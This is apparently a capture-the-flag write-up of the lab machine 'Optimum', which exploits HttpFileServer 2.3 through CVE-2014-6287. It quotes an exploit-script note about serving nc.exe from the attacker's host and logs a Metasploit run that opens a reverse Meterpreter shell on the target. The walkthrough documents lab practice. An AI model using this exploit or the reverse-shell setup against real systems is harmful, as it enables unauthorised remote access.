Optimum

# ENUMERATION

NMAP:
- 80: HttpFileServer httpd 2.3

So, in theory, I should be able to perhaps upload a file to exploit...

Server information
HttpFileServer 2.3
Server time: 29/7/2020 10:39:55 πμ
Server uptime: 00:21:17 

The website revealed a page with: User, Folder, Search, Select, and Actions

# ENUMERATION

Google: HttpFileServer httpd 2.3
First result:  CVE-2014-6287
- this is a python script

The script didn't reveal anything, but it did execute...  I need a listener

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

Nope... it didn't do anything, and there's no debugging info to guide me... on to the next thing.

# EXPLOIT
# METASPLOIT

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.27:4444 
[*] Using URL: http://0.0.0.0:8080/E4T7PQ27alPDd
[*] Local IP: http://192.168.69.157:8080/E4T7PQ27alPDd
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /E4T7PQ27alPDd
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.27:4444 -> 10.10.10.8:49210) at 2020-07-22 22:35:52 -0400
[!] Tried to delete %TEMP%\jMktuooYoaymeR.vbs, unknown result
[*] Server stopped.

meterpreter > id
[-] Unknown command: id.
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: OPTIMUM\kostas

# FURTHER RESEARCH, BUT PRESS ON

- As I am concentrating on foot-holds, and not privilege escallation, I am going to move on from this box.

# FOOTHOLD COMPLETE
# PRIVESC TO BE CONTINUED...